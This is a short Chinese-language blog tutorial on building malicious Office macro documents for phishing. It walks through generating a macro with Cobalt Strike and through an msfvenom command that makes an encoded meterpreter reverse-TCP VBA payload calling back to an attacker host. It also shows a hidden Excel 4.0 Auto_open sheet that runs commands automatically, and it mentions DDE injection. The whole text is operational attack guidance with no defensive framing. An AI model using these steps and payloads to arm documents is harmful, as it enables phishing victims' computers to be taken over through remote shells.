前言

office宏攻擊是釣魚郵件場(chǎng)景中最常見的攻擊手段，其制作簡(jiǎn)單，兼容性強(qiáng)，非常適合批量攻擊，但由于其需要用戶交互，隱蔽性差，攻擊能否成功基本取決于目標(biāo)的安全意識(shí)強(qiáng)弱。

宏病毒

office宏病毒一般寄存于office文檔中，如word，excel，ppt，以excel最常見，當(dāng)用戶打開這種文檔時(shí)，內(nèi)置的宏命令就會(huì)執(zhí)行，在計(jì)算機(jī)中執(zhí)行惡意命令。

一般的惡意命令會(huì)自動(dòng)訪問提前部署好的惡意服務(wù)器下載木馬程序到本地并運(yùn)行，從而控制計(jì)算機(jī)。

使用CobaltStrike的宏病毒生成功能可以輕松生成惡意宏代碼，部署CobaltStrike服務(wù)器并打開客戶端，創(chuàng)建一個(gè)監(jiān)聽器

然后點(diǎn)擊Attacks-Package-MS Office Macro-選定監(jiān)聽器-生成對(duì)應(yīng)的宏病毒-復(fù)制到剪貼板

然后創(chuàng)建一個(gè)新word-視圖-查看宏中新建一個(gè)宏名

在里面粘貼剛才復(fù)制的宏，并在保存時(shí)點(diǎn)擊否另存為.doxm文件

當(dāng)打開word文檔并點(diǎn)擊啟用宏代碼時(shí)，就會(huì)觸發(fā)宏，反彈shell到Cobalt Strike中

使用msf生成vba文件：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx lport=4444 -f vba -o 123.vba

后面的步驟與CobaltStrike中相似，創(chuàng)建一個(gè)新word-視圖-查看宏中新建一個(gè)宏名

在里面粘貼剛才復(fù)制的宏，并在保存時(shí)點(diǎn)擊否另存為.doxm文件

當(dāng)打開word文檔并點(diǎn)擊啟用宏代碼時(shí)，就會(huì)觸發(fā)宏，反彈shell到msf中

創(chuàng)建一個(gè)word或excel文檔，如果是word需要插入excel工作表

右鍵點(diǎn)擊底部的sheet-插入，選擇MS Excel 4.0宏表

在表格中寫入= EXEC(“calc.exe”)

點(diǎn)擊此格，將單元格命名為Auto_open，并可以將此sheet右鍵隱藏，重新打開word文檔將會(huì)自動(dòng)執(zhí)行命令。

excel中可以直接嵌入dde指令，參考csv注入中的攻擊方式即可。

參考文檔：http://uuzdaisuki.com/2020/07/16/csv%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8%E5%92%8C%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/

作者：Leticia's Blog ，詳情點(diǎn)擊閱讀原文。